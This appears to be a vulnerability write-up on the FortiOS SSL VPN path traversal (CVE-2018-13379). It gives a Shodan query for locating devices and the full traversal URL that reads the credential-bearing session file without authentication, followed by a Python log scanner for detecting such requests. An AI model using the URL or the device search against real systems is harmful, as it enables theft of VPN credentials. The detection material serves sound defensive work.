CVE-2018-13379 Fortinet FortiOS Path Traversal/Arbitrary File Read Vulnerability

Introduction

The Fortinet FortiOS SSL VPN web portal allows system files to be downloaded without authentication.

Device Identification

Identify vulnerable devices from the results of the following Shodan query:

http.html_hash:-1454941180


Path Traversal

The sslvpn_websession file, which contains credentials, can be accessed using the URL:

https://targetIP:port/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
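Detecting this traversal in web server logs is the defender's side of the same request. The script below is an added example written for this write-up, not code from the original post or from Fortinet. It assumes combined-format access log lines (the sample lines are constructed) and matches requests to /remote/fgt_lang whose lang parameter escapes the language directory or names the session file. The request is normalized first (percent-decoding, including double encoding, and collapsing of repeated slashes), because the URL above uses "..//////////" and a naive search for the literal "../" would miss it.

```python
"""Detect CVE-2018-13379 exploitation attempts in access logs.

Added example for this write-up (not part of the original post). Assumes
combined-log-format lines and the request shape described above:
GET /remote/fgt_lang?lang=<traversal path>. Sample log lines are constructed.
"""
import re
from urllib.parse import unquote, urlsplit, parse_qs

# Constructed sample lines (not real traffic). Lines 1 and 3 are traversal
# attempts (the third is percent-encoded); lines 2 and 4 are benign requests.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jan/2021:12:00:01 +0000] "GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1" 200 1234
198.51.100.7 - - [10/Jan/2021:12:00:02 +0000] "GET /remote/fgt_lang?lang=en HTTP/1.1" 200 512
203.0.113.9 - - [10/Jan/2021:12:00:03 +0000] "GET /remote/fgt_lang?lang=%2F..%2F..%2F..%2F..%2Fdev%2Fcmdb%2Fsslvpn_websession HTTP/1.1" 200 1234
192.0.2.4 - - [10/Jan/2021:12:00:04 +0000] "GET /remote/login?lang=en HTTP/1.1" 200 900
"""

# Combined log format: source, identd, user, [timestamp], "METHOD target PROTO", status
REQUEST_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def normalize(value: str) -> str:
    """Percent-decode twice (catches double encoding) and collapse repeated
    slashes, so '..////' and '..%2F' both end up as '../'."""
    decoded = unquote(unquote(value))
    return re.sub(r"/+", "/", decoded)


def is_traversal_attempt(target: str) -> bool:
    """True when the request targets /remote/fgt_lang and its lang value
    contains a '..' path segment or names the sslvpn_websession file."""
    parts = urlsplit(target)
    if parts.path != "/remote/fgt_lang":
        return False
    for lang in parse_qs(parts.query).get("lang", []):
        norm = normalize(lang)
        if ".." in norm.split("/") or "sslvpn_websession" in norm:
            return True
    return False


def scan_log(text: str):
    """Return (source_ip, timestamp, status, normalized_target) per hit."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        if is_traversal_attempt(m["target"]):
            hits.append((m["src"], m["ts"], int(m["status"]), normalize(m["target"])))
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("ALERT CVE-2018-13379 attempt:", hit)
```

The HTTP status is kept in each hit so an analyst can separate bare attempts from requests that were answered with content; any hit from an unpatched appliance should be treated as a credential exposure and followed by a password reset for the sessions involved.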

